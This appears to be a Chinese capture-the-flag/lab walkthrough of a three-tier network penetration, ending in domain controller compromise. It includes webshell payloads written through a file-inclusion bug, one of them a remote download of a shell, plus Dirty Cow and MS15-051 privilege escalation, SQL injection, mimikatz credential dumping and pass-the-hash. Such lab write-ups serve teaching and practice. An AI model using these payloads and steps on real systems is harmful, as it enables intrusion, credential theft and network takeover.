三层网络环境靶场渗透实战教学文档<\/h1>

环境准备<\/h2>

修改hosts文件<\/strong>：

路径：C:\Windows\System32\drivers\etc\hosts<\/code><\/li>
添加以下配置： 172.16.6.10 www.theyer.com 172.16.6.10 shop.theyer.com <\/code><\/pre> <\/li> <\/ul> <\/li> <\/ol> 外网边界渗透<\/h2> 信息收集<\/h3> 子域名发现<\/strong>：<\/p> 发现子域名：shop.theyer.com<\/code><\/li> <\/ul> <\/li> 目录扫描<\/strong>：<\/p> 发现upload<\/code>目录（后续利用点）<\/li> <\/ul> <\/li> 端口扫描<\/strong>：<\/p> 发现开放3306端口（MySQL），尝试爆破无果<\/li> <\/ul> <\/li> <\/ol> 入口点一：文件包含漏洞利用<\/h3> 漏洞发现<\/strong>：<\/p> URL：http:\/\/shop.theyer.com\/index.php?page=about.php<\/code><\/li> 存在文件包含漏洞<\/li> <\/ul> <\/li> 漏洞验证<\/strong>：<\/p> 使用php:\/\/input<\/code>伪协议执行PHP函数成功<\/li> <\/ul> <\/li> 写入Webshell方法<\/strong>：<\/p> 方法一：直接写入 <?<\/span>php<\/span> echo<\/span> `echo PD9waHAgQGV2YWwoJF9QT1NUWydhJ10pPz4=|base64 -d > upload\/shell.php`<\/span>; ?><\/span> <\/span><\/span><\/span><\/code><\/pre><\/li> 方法二：远程下载 <?<\/span>php<\/span> copy<\/span>("http:\/\/172.16.8.2\/1.txt"<\/span>, "upload\/shell.php"<\/span>); ?><\/span> <\/span><\/span><\/span><\/code><\/pre><\/li> 注意<\/strong>：直接写入当前目录可能无权限，upload<\/code>目录通常有写权限<\/li> <\/ul> <\/li> 获取第一个flag<\/strong>：<\/p> 通过菜刀连接后，在www目录发现第一个flag<\/li> <\/ul> <\/li> <\/ol> 提权操作<\/h3> 当前用户<\/strong>：<\/p> centos用户（非root）<\/li> <\/ul> <\/li> 内核提权<\/strong>：<\/p> 检查内核版本，使用脏牛(Dirty Cow)提权<\/li> 步骤： gcc -pthread dirty.c -o dirty -lcrypt <\/span><\/span>.\/dirty test123 <\/span><\/span><\/code><\/pre><\/li> 提权成功后通过SSH连接<\/li> 获取第二个flag<\/li> <\/ul> <\/li> <\/ol> 入口点二：APK渗透<\/h3> APK分析<\/strong>：<\/p> 从www.theyer.com<\/code>下载APK<\/li> 修改后缀为zip获取class.dex<\/code><\/li> 反汇编找到接口URL：.php?id=1<\/code><\/li> <\/ul> <\/li> SQL注入<\/strong>：<\/p> 对接口进行SQL注入测试，成功<\/li> <\/ul> <\/li> <\/ol> 内网渗透<\/h2> 网络发现<\/h3> 双网卡信息<\/strong>：<\/p> 发现内网网段：192.168.6.0\/24<\/li> <\/ul> <\/li> 代理设置<\/strong>：<\/p> 上传reGeorg，配置代理进行内网扫描<\/li> <\/ul> <\/li> <\/ol> 主机192.168.6.17渗透<\/h3> 信息收集<\/strong>：<\/p> 开放80端口<\/li> 目录扫描（注意控制速度）： python3 dirsearch.py -u http:\/\/192.168.6.17\/ -e * --delay 0.1 <\/span><\/span><\/code><\/pre><\/li> 发现admin<\/code>目录<\/li> <\/ul> <\/li> JS源码分析<\/strong>：<\/p> 发现泄漏的API接口：http:\/\/192.168.6.17\/message.php?id=1<\/code><\/li> <\/ul> <\/li> SQL注入利用<\/strong>：<\/p> 使用sqlmap：发现flag表和flag字段<\/li> 获取admin表密码：admin\/37s984pass<\/code>（MD5解密）<\/li> <\/ul> <\/li> <\/ul> <\/li> 后台getshell<\/strong>：<\/p> 登录后台（admin\/37s984pass）<\/li> 在个人信息上传处上传图片马getshell<\/li> Webshell路径：http:\/\/192.168.6.17\/upload\/images\/20200806121306.php<\/code><\/li> 获取根目录flag<\/li> <\/ul> <\/li> <\/ol> 主机192.168.6.16渗透（邮件服务器）<\/h3> 配置信息泄露<\/strong>：<\/p> 从\/inc\/config.php<\/code>获取： SMTP服务器：192.168.6.16<\/li> 凭据：zhangming@test.com\/fgpass2814<\/code><\/li> MySQL：myoa\/myoa123123<\/code><\/li> <\/ul> <\/li> <\/ul> <\/li> Web登录<\/strong>：<\/p> 使用邮箱凭据成功登录<\/li> <\/ul> <\/li> Cookie注入<\/strong>：<\/p> 发现cookie中id=1<\/code>存在SQL注入<\/li> 获取管理员凭据：admin\/22f2e5ec0bf4b85554c755993e2ba67f<\/code>（解密为2_333admin<\/code>）<\/li> <\/ul> <\/li> Tomcat弱口令<\/strong>：<\/p> 8080端口为Tomcat<\/li> 弱口令：tomcat\/tomcat<\/code><\/li> 部署war包getshell<\/li> 获取\/var\/www<\/code>和root目录下的flag<\/li> <\/ul> <\/li> 数据库连接<\/strong>：<\/p> 使用蚁剑连接数据库（注意webshell需要执行权限）<\/li> 获取更多凭据信息<\/li> <\/ul> <\/li> <\/ol> 主机192.168.6.200渗透（管理员主机）<\/h3> 日志分析<\/strong>：<\/p> 从\/var\/log\/apache2\/access_log<\/code>发现192.168.6.200访问记录<\/li> 推测为管理员主机<\/li> <\/ul> <\/li> RDP爆破<\/strong>：<\/p> 使用收集的密码组合字典<\/li> 成功登录：192.168.6.200:3389<\/code>，凭据admin\/2_333admin<\/code><\/li> <\/ul> <\/li> 提权操作<\/strong>：<\/p> 检查系统补丁，使用MS15-051提权<\/li> 全盘搜索flag： dir<\/span> c:\ \/s \/b | find "flag"<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ol> 域控渗透<\/h3> 域环境发现<\/strong>：<\/p> 域名：myad.com<\/code><\/li> 域控IP：10.1.1.10（通过ping和nslookup确认）<\/li> <\/ul> <\/li> 凭据获取<\/strong>：<\/p> 使用mimikatz获取： administrator明文：ppx()0778<\/code><\/li> admin明文和$server的hash<\/li> <\/ul> <\/li> <\/ul> <\/li> 域控登录<\/strong>：<\/p> 方法一：使用明文凭据 administrator\/ppx()0778<\/code><\/li> <\/ul> <\/li> 方法二：哈希传递<\/li> 访问\\10.1.1.10\c$<\/code>获取最终flag<\/li> <\/ul> <\/li> <\/ol> 关键知识点总结<\/h2> 文件包含漏洞利用<\/strong>：<\/p> php伪协议使用<\/li> 写入webshell的多种方法<\/li> <\/ul> <\/li> 提权技术<\/strong>：<\/p> 脏牛提权（Linux）<\/li> MS15-051提权（Windows）<\/li> <\/ul> <\/li> 内网渗透技巧<\/strong>：<\/p> 代理使用（reGeorg）<\/li> 日志分析获取关键信息<\/li> 凭据重用攻击<\/li> <\/ul> <\/li> 域渗透技术<\/strong>：<\/p> mimikatz使用<\/li> 哈希传递攻击<\/li> <\/ul> <\/li> 工具使用<\/strong>：<\/p> sqlmap<\/li> dirsearch<\/li> 蚁剑\/菜刀<\/li> <\/ul> <\/li> 密码策略<\/strong>：<\/p> 密码收集与整理<\/li> 密码爆破技巧<\/li> <\/ul> <\/li> <\/ol> 本教学文档完整还原了三层网络环境下的渗透过程，从外网边界突破到内网横向移动，最终获取域控权限的全流程。<\/p>